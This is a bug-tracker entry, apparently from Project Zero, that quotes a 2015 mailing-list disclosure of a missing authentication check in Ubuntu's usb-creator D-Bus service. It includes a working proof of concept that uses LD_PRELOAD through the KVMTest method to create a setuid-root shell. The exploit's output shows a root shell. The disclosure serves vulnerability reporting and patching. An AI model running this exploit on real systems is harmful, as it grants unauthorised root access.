New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Issue 413
Starred by 2 users
Status: Fixed
Owner:
cevans@google.com
Email to this user bounced
Closed: May 2015
Cc:
project-...@google.com



Sign in to add a comment
 Linux: missing authentication check in usb-creator leads to local privilege escalation
Reported by cevans@google.com, May 28 2015 Back to list 
[Also: http://www.ubuntu.com/usn/usn-2576-1/]

Date: Wed, 22 Apr 2015 16:50:08 -0700
From: Tavis Ormandy <taviso@...gle.com>
To: oss-security@...ts.openwall.com
Subject: USBCreator D-Bus service

Hello,

[as-per previous discussion on the vendors list, skipping closed
discussion of low-severity issue]

On my Ubuntu VM, I have a D-Bus service listening on
com.ubuntu.USBCreator. As far as I can tell, this is installed by
default.

It looks like the author intended for all the methods to call
check_polkit, but KVMTest doesn't.

This seems like an obvious mistake, and the following appears to work
on my machine:

$ cat > test.c
void __attribute__((constructor)) init (void)
{
chown("/tmp/test", 0, 0);
chmod("/tmp/test", 04755);
}
^D
$ gcc -shared -fPIC -o /tmp/test.so test.c
$ cp /bin/sh /tmp/test
$ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator
/com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda
dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
$ ls -l /tmp/test
-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
$ /tmp/test
# id
euid=0(root) groups=0(root)

Thanks, Tavis.


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
Sign in to add a comment